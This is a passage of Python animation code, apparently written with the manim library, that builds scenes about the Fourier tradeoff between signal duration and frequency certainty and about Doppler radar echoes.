y_title.next_to(axes.y_axis, UP, SMALL_BUFF)
axes.add(time_label, y_title)
axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)
graph = axes.get_graph(
self.get_multispike_function(list(range(1, 4))),
x_min = 0.8,
x_max = 3.8,
)
graph.set_color(YELLOW)
#Label short duration
brace = Brace(Line(
axes.input_to_graph_point(1, graph),
axes.input_to_graph_point(3, graph),
), UP)
text = TextMobject("Short duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, SMALL_BUFF)
text.align_to(
axes.coords_to_point(0.25, 0), LEFT
)
self.play(
self.get_flashes(car1, num_flashes = 2),
self.get_flashes(car2, num_flashes = 2),
LaggedStartMap(FadeIn, VGroup(
axes, time_label, y_title,
))
)
self.play(
self.get_flashes(car1, num_flashes = 3),
self.get_flashes(car2, num_flashes = 3),
ShowCreation(graph, rate_func=linear, run_time = 3)
)
self.play(
self.get_flashes(car1, num_flashes = 10),
self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),
GrowFromCenter(brace),
Write(text),
)
self.time_axes = axes
self.time_graph = graph
self.time_graph_label = VGroup(
brace, text
)
def show_low_confidence(self):
car1, car2 = cars = self.cars
time_axes = self.time_axes
#Setup axes
frequency_axes = Axes(
x_min = 0,
x_max = 3,
y_min = 0,
y_max = 1.5,
y_axis_config = {
"tick_frequency" : 0.5,
}
)
frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)
frequency_axes.set_color(LIGHT_GREY)
frequency_label = TextMobject("Frequency")
frequency_label.scale(self.text_scale_val)
frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)
frequency_axes.add(
frequency_label,
VectorizedPoint(frequency_axes.y_axis.get_top())
)
frequency_axes.x_axis.add_numbers(1, 2)
frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-4*(x-1)**2),
x_min = 0,
x_max = 2,
)
frequency_graph.set_color(RED)
peak_point = frequency_axes.input_to_graph_point(
1, frequency_graph
)
#Setup label
label = TextMobject("Low confidence")
label.scale(self.text_scale_val)
label.move_to(peak_point + UP+RIGHT, DOWN)
label.match_color(frequency_graph)
arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)
arrow.match_color(frequency_graph)
self.play(
ReplacementTransform(
self.time_axes.copy(), frequency_axes
),
ReplacementTransform(
self.time_graph.copy(), frequency_graph
),
)
self.play(
Write(label),
GrowArrow(arrow)
)
self.wait()
self.frequency_axes = frequency_axes
self.frequency_graph = frequency_graph
self.frequency_graph_label = VGroup(
label, arrow
)
def flash_in_sync_long_time(self):
time_graph = self.time_graph
time_axes = self.time_axes
frequency_graph = self.frequency_graph
frequency_axes = self.frequency_axes
n_spikes = 12
new_time_graph = time_axes.get_graph(
self.get_multispike_function(list(range(1, n_spikes+1))),
x_min = 0.8,
x_max = n_spikes + 0.8,
)
new_time_graph.match_color(time_graph)
new_frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-500*(x-1)**2),
x_min = 0,
x_max = 2,
num_anchors = 500,
)
new_frequency_graph.match_color(self.frequency_graph)
def pin_freq_graph_end_points(freq_graph):
freq_graph.points[0] = frequency_axes.coords_to_point(0, 0)
freq_graph.points[-1] = frequency_axes.coords_to_point(2, 0)
self.play(LaggedStartMap(
FadeOut, VGroup(
self.time_graph_label,
self.frequency_graph_label,
self.time_graph,
)
))
self.play(
ApplyMethod(
self.time_axes.x_axis.stretch, 2.5, 0,
{"about_edge" : LEFT},
run_time = 4,
rate_func = squish_rate_func(smooth, 0.3, 0.6),
),
UpdateFromFunc(
self.time_axes.x_axis.tip,
lambda m : m.move_to(
self.time_axes.x_axis.get_right(),
LEFT
)
),
ShowCreation(
new_time_graph,
run_time = n_spikes,
rate_func=linear,
),
ApplyMethod(
frequency_graph.stretch, 0.1, 0,
run_time = n_spikes,
),
UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),
*[
self.get_flashes(car, num_flashes = n_spikes)
for car in self.cars
]
)
self.new_time_graph = new_time_graph
self.new_frequency_graph = new_frequency_graph
def show_high_confidence(self):
#Frequency stuff
arrow = self.frequency_graph_label[1]
label = TextMobject("High confidence")
label.scale(self.text_scale_val)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(arrow)
frequency_axes = self.frequency_axes
#Time stuff
new_time_graph = self.new_time_graph
brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)
text = TextMobject("Long duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, buff = SMALL_BUFF)
self.play(
FadeIn(label),
GrowArrow(arrow),
*list(map(self.get_flashes, self.cars))
)
self.play(
GrowFromCenter(brace),
Write(text, run_time = 1),
*list(map(self.get_flashes, self.cars))
)
self.play(*[
self.get_flashes(car, num_flashes = 10)
for car in self.cars
])
###
def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):
return AnimationGroup(*[
MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)
for light, color in zip(car.get_lights(), colors)
])
def get_multispike_function(self, spike_times):
return lambda x : sum([
1.25*np.exp(-100*(x-m)**2)
for m in spike_times
])
class VariousMusicalNotes(Scene):
def construct(self):
freq = 20
# x-coordinate of this point represents log(a)
# where the bell curve component of the signal
# is exp(-a*(x**2))
graph_width_tracker = ExponentialValueTracker(1)
def get_graph():
a = graph_width_tracker.get_value()
return FunctionGraph(
lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,
step_size = 0.001,
)
graph = get_graph()
def graph_update(graph):
graph.points = get_graph().points
graph_update_anim = UpdateFromFunc(graph, graph_update)
def change_width_anim(width, **kwargs):
a = 2.0/(width**2)
return AnimationGroup(
ApplyMethod(graph_width_tracker.set_value, a),
graph_update_anim,
**kwargs
)
change_width_anim(FRAME_X_RADIUS).update(1)
graph_update_anim.update(0)
phrases = [
TextMobject(*words.split(" "))
for words in [
"Very clear frequency",
"Less clear frequency",
"Extremely unclear frequency",
]
]
#Show graphs and phrases
widths = [FRAME_X_RADIUS, 1, 0.2]
for width, phrase in zip(widths, phrases):
brace = Brace(Line(LEFT, RIGHT), UP)
brace.stretch(width, 0)
brace.next_to(graph.get_center(), UP, buff = 1.2)
phrase.next_to(brace, UP)
if width is widths[0]:
self.play(ShowCreation(graph, rate_func=linear)),
self.play(
GrowFromCenter(brace),
Write(phrase, run_time = 1)
)
else:
self.play(
change_width_anim(width),
ReplacementTransform(
VGroup(last_phrase, last_brace),
VGroup(phrase, brace),
rate_func = squish_rate_func(smooth, 0.5, 1),
),
run_time = 2
)
self.wait()
# self.play(*map(FadeOut, [graph, brace, phrase]))
last_phrase = phrase
last_brace = brace
#Talk about correlations
short_signal_words = TextMobject(
"Short", "signal", "correlates",
"with", "wide range", "of frequencies"
)
long_signal_words = TextMobject(
"Only", "wide", "signals", "correlate",
"with a", "short range", "of frequencies"
)
phrases = VGroup(short_signal_words, long_signal_words)
for phrase in phrases:
phrase.scale(0.8)
phrase.set_color_by_tex_to_color_map({
"short" : RED,
"long" : GREEN,
"wide" : GREEN,
}, case_sensitive = False)
phrases.arrange(DOWN)
phrases.to_edge(UP)
long_graph = FunctionGraph(
lambda x : 0.5*np.sin(freq*x),
x_min = -FRAME_WIDTH,
x_max = FRAME_WIDTH,
n_components = 0.001
)
long_graph.set_color(BLUE)
long_graph.next_to(graph, UP, MED_LARGE_BUFF)
self.play(
ShowCreation(long_graph),
*list(map(FadeOut, [last_brace, last_phrase]))
)
self.play(
Write(short_signal_words),
change_width_anim(widths[2])
)
self.play(
long_graph.stretch, 0.35, 0,
long_graph.set_color, GREEN,
run_time = 5,
rate_func = wiggle
)
self.wait()
self.play(
Write(long_signal_words),
change_width_anim(widths[0]),
)
self.play(
long_graph.stretch, 0.95, 0,
long_graph.set_color, average_color(GREEN, BLUE),
run_time = 4,
rate_func = wiggle
)
self.wait()
class CrossOutDefinitenessAndCertainty(TeacherStudentsScene):
def construct(self):
words = VGroup(
TextMobject("Definiteness"),
TextMobject("Certainty"),
)
words.arrange(DOWN)
words.next_to(self.teacher, UP+LEFT)
crosses = VGroup(*list(map(Cross, words)))
self.add(words)
self.play(
self.teacher.change, "sassy",
ShowCreation(crosses[0])
)
self.play(
self.get_student_changes(*3*["erm"]),
ShowCreation(crosses[1])
)
self.wait(2)
class BringInFourierTranform(TeacherStudentsScene):
def construct(self):
fourier = TextMobject("Fourier")
fourier.scale(1.5)
fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)
fourier.save_state()
fourier.shift(DOWN)
fourier.fade(1)
self.play(
self.teacher.change, "raise_right_hand",
fourier.restore
)
self.change_student_modes("happy", "erm", "confused")
self.look_at(3*LEFT + 2*UP)
self.wait(3)
class LastVideoWrapper(Scene):
def construct(self):
title = TextMobject("Visualizing the Fourier Transform")
title.to_edge(UP)
screen_rect = ScreenRectangle(height = 6)
screen_rect.next_to(title, DOWN)
self.add(title)
self.play(ShowCreation(screen_rect))
self.wait()
class FourierRecapScene(DrawFrequencyPlot):
CONFIG = {
"frequency_axes_config" : {
"x_max" : 10.0,
"x_axis_config" : {
"unit_size" : 0.7,
"numbers_to_show" : list(range(1, 10, 1)),
}
},
"initial_winding_frequency" : 0.1,
}
def construct(self):
self.setup_axes()
self.preview_fourier_plot()
self.wrap_signal_around_circle()
self.match_winding_to_beat_frequency()
self.follow_center_of_mass()
self.draw_fourier_plot()
self.set_color_spike()
def setup_axes(self):
self.remove(self.pi_creature)
time_axes = self.get_time_axes()
time_axes.to_edge(UP, buff = MED_SMALL_BUFF)
time_axes.scale(0.9, about_edge = UP)
frequency_axes = self.get_frequency_axes()
circle_plane = self.get_circle_plane()
self.add(time_axes)
self.set_variables_as_attrs(
time_axes, frequency_axes,
circle_plane
)
def preview_fourier_plot(self):
time_graph = self.graph = self.get_time_graph(
width = 2,
num_graph_points = 200,
)
fourier_graph = self.get_fourier_transform_graph(
time_graph
)
fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)
#labels
signal_label = TextMobject("Signal")
fourier_label = TextMobject("Fourier transform")
signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)
fourier_label.next_to(fourier_graph, UP)
fourier_label.match_color(fourier_graph)
self.play(
ShowCreation(time_graph, run_time = 2),
Write(signal_label),
)
self.wait()
self.play(
LaggedStartMap(FadeIn, self.frequency_axes),
ReplacementTransform(
time_graph.copy(),
fourier_graph,
run_time = 2
),
ReplacementTransform(
signal_label.copy(),
fourier_label,
run_time = 2,
rate_func = squish_rate_func(smooth, 0.5, 1)
),
)
self.wait()
self.play(LaggedStartMap(
Indicate, self.frequency_axes.x_axis.numbers,
run_time = 4,
rate_func = wiggle,
))
self.wait()
self.play(*list(map(FadeOut, [
self.frequency_axes, fourier_graph,
signal_label, fourier_label,
])))
self.time_graph = time_graph
self.set_variables_as_attrs(time_graph, fourier_label)
def wrap_signal_around_circle(self):
time_graph = self.time_graph
circle_plane = self.circle_plane
freq = self.initial_winding_frequency
pol_graph = self.get_polarized_mobject(time_graph, freq)
winding_freq_label = self.get_winding_frequency_label()
winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))
winding_freq_label.move_to(circle_plane.get_top(), DOWN)
self.add_foreground_mobjects(winding_freq_label)
self.play(
Write(circle_plane, run_time = 1),
ReplacementTransform(
time_graph.copy(), pol_graph,
path_arc = -TAU/4,
run_time_per_flash = 2,
run_time = 2,
),
FadeIn(winding_freq_label),
)
freq = 0.3
self.change_frequency(freq, run_time = 2)
ghost_pol_graph = pol_graph.copy()
self.remove(pol_graph)
self.play(ghost_pol_graph.set_stroke, {"width" : 0.5})
self.play(
*self.get_vector_animations(time_graph),
run_time = 15
)
self.remove(ghost_pol_graph)
self.wait()
def match_winding_to_beat_frequency(self):
self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)
self.add(self.v_lines_indicating_periods)
for freq in range(1, 6):
self.change_frequency(freq, run_time = 5)
self.play(
*self.get_vector_animations(
self.time_graph,
draw_polarized_graph = False
),
run_time = 10
)
self.wait()
def follow_center_of_mass(self):
com_dot = self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
com_arrow = Arrow(UP+3*RIGHT, ORIGIN)
com_arrow.shift(com_dot.get_center())
com_arrow.match_color(com_dot)
com_words = TextMobject("Center of mass")
com_words.next_to(com_arrow.get_start(), UP)
com_words.match_color(com_arrow)
com_words.add_background_rectangle()
com_dot.save_state()
com_dot.move_to(com_arrow.get_start())
com_dot.fade(1)
self.play(
com_dot.restore,
GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),
Write(com_words),
)
self.wait()
squished_func = squish_rate_func(smooth, 0, 0.2)
self.change_frequency(
4,
added_anims = [
FadeOut(com_arrow, rate_func = squished_func),
FadeOut(com_words, rate_func = squished_func),
],
run_time = 5
)
def draw_fourier_plot(self):
frequency_axes = self.frequency_axes
fourier_label = self.fourier_label
self.change_frequency(0, run_time = 2)
self.play(
FadeIn(frequency_axes),
FadeIn(fourier_label),
)
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.get_fourier_graph_drawing_update_anim(fourier_graph)
self.generate_fourier_dot_transform(fourier_graph)
self.change_frequency(5, run_time = 20)
self.wait()
self.change_frequency(7.5, run_time = 10)
self.fourier_graph_drawing_update_anim = Animation(Mobject())
self.fourier_graph = fourier_graph
def set_color_spike(self):
spike_point = self.frequency_axes.input_to_graph_point(
5, self.fourier_graph
)
circle = Circle(color = YELLOW, radius = 0.25)
circle.move_to(spike_point)
circle.save_state()
circle.scale(5)
circle.fade(1)
self.change_frequency(5)
self.play(circle.restore)
self.play(FadeOut(circle))
self.wait()
for x in range(2):
self.change_frequency(5.2, run_time = 3)
self.change_frequency(4.8, run_time = 3)
self.change_frequency(5, run_time = 1.5)
self.wait()
#########
def get_time_graph(self, frequency = 5, width = 2, **kwargs):
# low_x = center-width/2
# high_x = center+width/2
# new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)
# def func(x):
# pure_signal = 0.9*np.cos(TAU*frequency*x)
# factor = new_smooth(x - low_x) - new_smooth(x-high_x)
# return 1 + factor*pure_signal
graph = self.time_axes.get_graph(
lambda x : 1+0.9*np.cos(TAU*frequency*x),
x_min = 0, x_max = width,
**kwargs
)
graph.set_color(YELLOW)
return graph
class RealPartOfInsert(Scene):
def construct(self):
words = TextMobject("(Real part of the)")
words.set_color(RED)
self.add(words)
self.play(Write(words))
self.wait(5)
class CenterOfMassDescription(FourierRecapScene):
def construct(self):
self.remove(self.pi_creature)
circle_plane = self.get_circle_plane()
circle_plane.save_state()
circle_plane.generate_target()
circle_plane.target.set_height(FRAME_HEIGHT)
circle_plane.target.center()
circle_plane.target.axes.set_stroke(width = 2)
circle_plane.targets.set_stroke(width = 2)
circle_plane.target.secondary_lines.set_stroke(width = 1)
start_coords = (0.5, 0.5)
alt_coords = (0.8, 0.8)
com_dot = Dot(color = self.center_of_mass_color)
com_dot.move_to(circle_plane.coords_to_point(*start_coords))
self.add(circle_plane, com_dot)
self.wait()
self.play(
MoveToTarget(circle_plane),
com_dot.move_to,
circle_plane.target.coords_to_point(*start_coords)
)
self.wait()
alt_com_dot = com_dot.copy().move_to(
circle_plane.coords_to_point(*alt_coords)
)
for dot in com_dot, alt_com_dot:
line = Line(ORIGIN, dot.get_center())
line.match_color(com_dot)
angle = line.get_angle()
line.rotate(-angle, about_point = ORIGIN)
brace = Brace(line, UP)
words = brace.get_text("Strength of frequency")
words.add_background_rectangle()
dot.length_label_group = VGroup(line, brace, words)
dot.length_label_group.rotate(angle, about_point = ORIGIN)
line, brace, words = com_dot.length_label_group
self.play(
GrowFromCenter(line),
GrowFromCenter(brace),
FadeIn(words),
)
self.wait()
self.play(
Transform(
com_dot.length_label_group,
alt_com_dot.length_label_group,
),
Transform(com_dot, alt_com_dot),
rate_func = there_and_back,
run_time = 4,
)
#Do rotation
line = com_dot.length_label_group[0]
com_dot.length_label_group.remove(line)
angle = line.get_angle()
arc, alt_arc = [
Arc(
start_angle = 0,
angle = factor*angle,
radius = 0.5,
)
for factor in (1, 2)
]
theta = TexMobject("\\theta")
theta.shift(1.5*arc.point_from_proportion(0.5))
self.play(
FadeOut(com_dot.length_label_group),
Animation(line),
ShowCreation(arc),
Write(theta)
)
self.play(
Rotate(
VGroup(line, com_dot),
angle, about_point = ORIGIN
),
Transform(arc, alt_arc),
theta.move_to, 1.5*alt_arc.point_from_proportion(0.5),
rate_func = there_and_back,
run_time = 4
)
self.wait()
class AskAboutLongVsShort(TeacherStudentsScene):
def construct(self):
self.student_says(
"What happens if we \\\\ change the length of \\\\ the signal?",
student_index = 2,
)
self.play(
self.teacher.change, "happy",
self.get_student_changes("pondering", "confused", "raise_right_hand")
)
self.wait(5)
class LongAndShortSignalsInWindingMachine(FourierRecapScene):
CONFIG = {
"num_fourier_graph_points" : 1000,
}
def construct(self):
self.setup_axes()
self.extend_for_long_time()
self.note_sharp_fourier_peak()
self.very_short_signal()
self.note_wide_fourier_peak()
def setup_axes(self):
FourierRecapScene.setup_axes(self)
self.add(self.circle_plane)
self.add(self.frequency_axes)
self.time_graph = self.graph = self.get_time_graph(width = 2)
self.add(self.time_graph)
self.force_skipping()
self.wrap_signal_around_circle()
fourier_graph = self.get_fourier_transform_graph(self.time_graph)
self.fourier_graph = fourier_graph
self.add(fourier_graph)
self.change_frequency(5)
self.revert_to_original_skipping_status()
def extend_for_long_time(self):
short_time_graph = self.time_graph
long_time_graph = self.get_time_graph(
width = 10,
num_graph_points = 500,
)
long_time_graph.set_stroke(width = 2)
new_freq = 5.1
long_pol_graph = self.get_polarized_mobject(
long_time_graph,
freq = new_freq
)
fourier_graph = self.fourier_graph
self.change_frequency(new_freq)
self.play(
FadeOut(self.graph),
FadeOut(self.graph.polarized_mobject),
FadeOut(fourier_graph)
)
self.play(
ShowCreation(long_time_graph, rate_func=linear),
ShowCreation(long_pol_graph, rate_func=linear),
run_time = 5
)
self.wait()
self.time_graph = self.graph = long_time_graph
def note_sharp_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.time_graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 5.1)
def very_short_signal(self):
time_graph = self.time_graph
fourier_graph = self.fourier_graph
short_time_graph = self.get_time_graph(width = 0.6)
new_freq = 5.1
short_pol_graph = self.get_polarized_mobject(
short_time_graph,
freq = new_freq
)
self.play(
FadeOut(fourier_graph),
FadeOut(time_graph),
FadeOut(time_graph.polarized_mobject),
)
self.play(
ShowCreation(short_time_graph),
ShowCreation(short_time_graph.polarized_mobject),
)
self.graph = self.time_graph = short_time_graph
self.change_frequency(6.66, run_time = 5)
def note_wide_fourier_peak(self):
fourier_graph = self.get_fourier_transform_graph(
self.graph,
num_graph_points = self.num_fourier_graph_points
)
self.fourier_graph = fourier_graph
self.note_fourier_peak(fourier_graph, 5, 6.66)
###
def note_fourier_peak(self, fourier_graph, freq1, freq2):
fourier_graph = self.fourier_graph
dots = self.get_fourier_graph_dots(fourier_graph, freq1, freq2)
self.get_center_of_mass_dot()
self.generate_center_of_mass_dot_update_anim()
self.generate_fourier_dot_transform(fourier_graph)
dot = self.fourier_graph_dot
arrow = Arrow(UP, ORIGIN, buff = SMALL_BUFF)
arrow.next_to(dot, UP, buff = SMALL_BUFF)
self.play(ShowCreation(fourier_graph))
self.change_frequency(freq1,
added_anims = [
MaintainPositionRelativeTo(arrow, dot),
UpdateFromAlphaFunc(
arrow,
lambda m, a : m.set_fill(opacity = a)
),
],
run_time = 3,
)
self.wait()
self.change_frequency(freq2,
added_anims = [
MaintainPositionRelativeTo(arrow, dot)
],
run_time = 3
)
self.wait()
self.play(*list(map(FadeOut, [
dot, arrow, self.center_of_mass_dot
])))
#This is not great...
for attr in "center_of_mass_dot", "fourier_graph_dot":
self.__dict__.pop(attr)
def get_fourier_graph_dots(self, fourier_graph, *freqs):
axis_point = self.frequency_axes.coords_to_point(4.5, -0.25)
dots = VGroup()
for freq in freqs:
point = self.frequency_axes.input_to_graph_point(freq, fourier_graph)
dot = Dot(point)
dot.scale(0.5)
dots.add(dot)
vect = point - axis_point
vect *= 1.3/get_norm(vect)
arrow = Arrow(vect, ORIGIN, buff = SMALL_BUFF)
arrow.set_color(YELLOW)
arrow.shift(point)
dot.arrow = arrow
return dots
class FocusRectangleInsert(FourierRecapScene):
CONFIG = {
"target_width" : 0.5
}
def construct(self):
self.setup_axes()
self.clear()
point = self.frequency_axes.coords_to_point(5, 0.25)
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect.set_stroke(YELLOW, 2)
self.add(rect)
self.wait()
self.play(
rect.stretch_to_fit_width, self.target_width,
rect.stretch_to_fit_height, 1.5,
rect.move_to, point,
run_time = 2
)
self.wait(3)
class BroadPeakFocusRectangleInsert(FocusRectangleInsert):
CONFIG = {
"target_width" : 1.5,
}
class CleanerFourierTradeoff(FourierTradeoff):
CONFIG = {
"show_text" : False,
"complex_to_real_func" : lambda z : z.real,
"widths" : [0.02, 6, 1],
}
class MentionDopplerRadar(TeacherStudentsScene):
def construct(self):
words = TextMobject("Doppler Radar")
words.next_to(self.teacher, UP)
words.save_state()
words.shift(DOWN).fade(1)
dish = RadarDish()
dish.next_to(self.students, UP, buff = 2, aligned_edge = LEFT)
plane = Plane()
plane.to_edge(RIGHT)
plane.align_to(dish)
always_shift(plane, LEFT, 1)
plane.flip()
pulse = RadarPulse(dish, plane)
look_at_anims = [
Mobject.add_updater(
pi, lambda pi : pi.look_at(pulse.mobject)
)
for pi in self.get_pi_creatures()
]
self.add(dish, plane, pulse, *look_at_anims)
self.play(
self.teacher.change, "hooray",
words.restore
)
self.change_student_modes("pondering", "erm", "sassy")
self.wait(2)
self.play(
self.teacher.change, "happy",
self.get_student_changes(*["thinking"]*3)
)
self.wait()
dish.set_stroke(width = 0)
self.play(UpdateFromAlphaFunc(
VGroup(plane, dish),
lambda m, a : m.set_fill(opacity = 1 - a)
))
class IntroduceDopplerRadar(Scene):
CONFIG = {
"frequency_spread_factor" : 100,
}
def construct(self):
self.setup_axes()
self.measure_distance_with_time()
self.show_frequency_shift()
self.show_frequency_shift_in_fourier()
def setup_axes(self):
self.dish = RadarDish()
self.dish.to_corner(UP+LEFT)
axes = Axes(
x_min = 0,
x_max = 10,
y_min = -1.5,
y_max = 1.5
)
axes.move_to(DOWN)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.time_label = time_label
axes.add(time_label)
self.axes = axes
self.add(self.dish)
self.add(axes)
def measure_distance_with_time(self):
dish = self.dish
axes = self.axes
distance = 5
time_diff = 5
speed = (2*distance)/time_diff
randy = Randolph().flip()
randy.match_height(dish)
randy.move_to(dish.get_right(), LEFT)
randy.shift(distance*RIGHT)
pulse_graph, echo_graph, sum_graph = \
self.get_pulse_and_echo_graphs(
self.get_single_pulse_graph,
(1,), (1+time_diff,)
)
words = ["Original signal", "Echo"]
for graph, word in zip([pulse_graph, echo_graph], words):
arrow = Vector(DOWN)
arrow.next_to(graph.peak_point, UP, SMALL_BUFF)
arrow.match_color(graph)
graph.arrow = arrow
label = TextMobject(word)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(graph)
graph.label = label
double_arrow = DoubleArrow(
pulse_graph.peak_point,
echo_graph.peak_point,
color = WHITE
)
distance_text = TextMobject("$2 \\times$ distance/(signal speed)")
distance_text.set_width(0.9*double_arrow.get_width())
distance_text.next_to(double_arrow, UP, SMALL_BUFF)
#v_line anim?
pulse = RadarPulseSingleton(
dish, randy,
speed = 0.97*speed, #Just needs slightly better alignment
)
graph_draw = turn_animation_into_updater(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 0.97*axes.x_max
)
)
randy_look_at = Mobject.add_updater(
randy, lambda pi : pi.look_at(pulse.mobject)
)
axes_anim = ContinualAnimation(axes)
self.add(randy_look_at, axes_anim, graph_draw)
self.wait(0.5)
self.add(pulse)
self.play(
Write(pulse_graph.label),
GrowArrow(pulse_graph.arrow),
run_time = 1,
)
self.play(randy.change, "pondering")
self.wait(time_diff - 2)
self.play(
Write(echo_graph.label),
GrowArrow(echo_graph.arrow),
run_time = 1
)
self.wait()
self.play(
GrowFromCenter(double_arrow),
FadeIn(distance_text)
)
self.wait()
self.remove(graph_draw, pulse, randy_look_at, axes_anim)
self.add(axes)
self.play(LaggedStartMap(FadeOut, VGroup(
sum_graph, randy,
pulse_graph.arrow, pulse_graph.label,
echo_graph.arrow, echo_graph.label,
double_arrow, distance_text
)))
def show_frequency_shift(self):
axes = self.axes
dish = self.dish
plane = Plane()
plane.flip()
plane.move_to(dish)
plane.to_edge(RIGHT)
time_diff = 6
pulse_graph, echo_graph, sum_graph = graphs = \
self.get_pulse_and_echo_graphs(
self.get_frequency_pulse_graph,
(1,25), (1+time_diff,50)
)
for graph in graphs:
graph.set_stroke(width = 3)
signal_graph = self.get_frequency_pulse_graph(1)
pulse_brace = Brace(Line(ORIGIN, RIGHT), UP)
pulse_brace.move_to(axes.coords_to_point(1, 1.2))
echo_brace = pulse_brace.copy()
echo_brace.stretch(0.6, 0)
echo_brace.move_to(axes.coords_to_point(7, 1.2))
pulse_text = pulse_brace.get_text("Original signal")
pulse_text.add_background_rectangle()
echo_text = echo_brace.get_text("Echo")
echo_subtext = TextMobject("(Higher frequency)")
echo_subtext.next_to(echo_text, RIGHT)
echo_subtext.match_color(echo_graph)
graph_draw = turn_animation_into_updater(
ShowCreation(sum_graph, run_time = 8, rate_func=linear)
)
pulse = RadarPulse(dish, plane, n_pulse_singletons = 12)
always_shift(plane, LEFT, 1.5)
self.add(graph_draw, pulse, plane)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = a)
))
self.play(
GrowFromCenter(pulse_brace),
FadeIn(pulse_text),
)
self.wait(3)
self.play(
GrowFromCenter(echo_brace),
GrowFromCenter(echo_text),
)
self.play(UpdateFromAlphaFunc(
plane, lambda m, a : m.set_fill(opacity = 1-a)
))
#Only for when -s is run
graph_draw.update(10)
self.wait(0.1)
self.play(Write(echo_subtext, run_time = 1))
self.wait()
self.remove(graph_draw, pulse, plane)
pulse_graph.set_stroke(width = 0)
echo_graph.set_stroke(width = 0)
self.time_graph_group = VGroup(
axes, pulse_brace, pulse_text,
echo_brace, echo_text, echo_subtext,
pulse_graph, echo_graph, sum_graph,
)
self.set_variables_as_attrs(*self.time_graph_group)
def show_frequency_shift_in_fourier(self):
sum_graph = self.sum_graph
pulse_graph = self.pulse_graph
pulse_label = VGroup(self.pulse_brace, self.pulse_text)
echo_graph = self.echo_graph
echo_label = VGroup(
self.echo_brace, self.echo_text, self.echo_subtext
)
#Setup all fourier graph stuff
f_max = 0.02
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {"unit_size" : 0.5},
y_min = -f_max, y_max = f_max,
y_axis_config = {
"unit_size" : 50,
"tick_frequency" : 0.01,
},
)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP,
)
frequency_label.to_edge(RIGHT)
frequency_axes.add(frequency_label)
for graph in pulse_graph, echo_graph, sum_graph:
graph.fourier_transform = get_fourier_graph(
frequency_axes, graph.underlying_function,
frequency_axes.x_min, 25,
complex_to_real_func = abs,
)
#Braces labeling F.T.
original_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(7, 0.9*f_max),
frequency_axes.coords_to_point(9, 0.9*f_max),
),
UP,
).set_color(BLUE)
echo_fourier_brace = Brace(
Line(
frequency_axes.coords_to_point(14, 0.4*f_max),
frequency_axes.coords_to_point(18, 0.4*f_max),
),
UP,
).set_color(YELLOW)
# braces = [original_fourier_brace, echo_fourier_brace]
# words = ["original signal", "echo"]
# for brace, word in zip(braces, words):
# brace.add(brace.get_text("F.T. of \\\\ %s"%word))
fourier_label = TexMobject("||\\text{Fourier transform}||")
# fourier_label.next_to(sum_graph.fourier_transform, UP, MED_LARGE_BUFF)
fourier_label.next_to(frequency_axes.y_axis, UP, buff = SMALL_BUFF)
fourier_label.shift_onto_screen()
fourier_label.set_color(RED)
#v_lines
v_line = DashedLine(
frequency_axes.coords_to_point(8, 0),
frequency_axes.coords_to_point(8, 1.2*f_max),
color = YELLOW,
dash_length = 0.025,
)
v_line_pair = VGroup(*[
v_line.copy().shift(u*0.6*RIGHT)
for u in (-1, 1)
])
v_line = VGroup(v_line)
double_arrow = DoubleArrow(
frequency_axes.coords_to_point(8, 0.007),
frequency_axes.coords_to_point(16, 0.007),
buff = 0,
color = WHITE
)
self.play(
self.time_graph_group.to_edge, UP,
ApplyMethod(
self.dish.shift, 2*UP,
remover = True
),
FadeIn(frequency_axes)
)
self.wait()
self.play(
FadeOut(sum_graph),
FadeOut(echo_label),
pulse_graph.set_stroke, {"width" : 3},
)
self.play(
ReplacementTransform(
pulse_label[0].copy(),
original_fourier_brace
),
ShowCreation(pulse_graph.fourier_transform)
)
self.play(Write(fourier_label))
self.wait()
self.play(ShowCreation(v_line))
self.wait()
self.play(ReplacementTransform(v_line, v_line_pair))
self.wait()
self.play(FadeOut(v_line_pair))
self.wait()
self.play(
FadeOut(pulse_graph),
FadeIn(sum_graph),
ReplacementTransform(
pulse_graph.fourier_transform,
sum_graph.fourier_transform
)
)
self.play(FadeIn(echo_label))
self.play(ReplacementTransform(
echo_label[0].copy(),
echo_fourier_brace,
))
self.wait(2)
self.play(GrowFromCenter(double_arrow))
self.wait()
###
def get_graph(self, func, **kwargs):
graph = self.axes.get_graph(func, **kwargs)
graph.peak_point = self.get_peak_point(graph)
return graph
def get_single_pulse_graph(self, x, **kwargs):
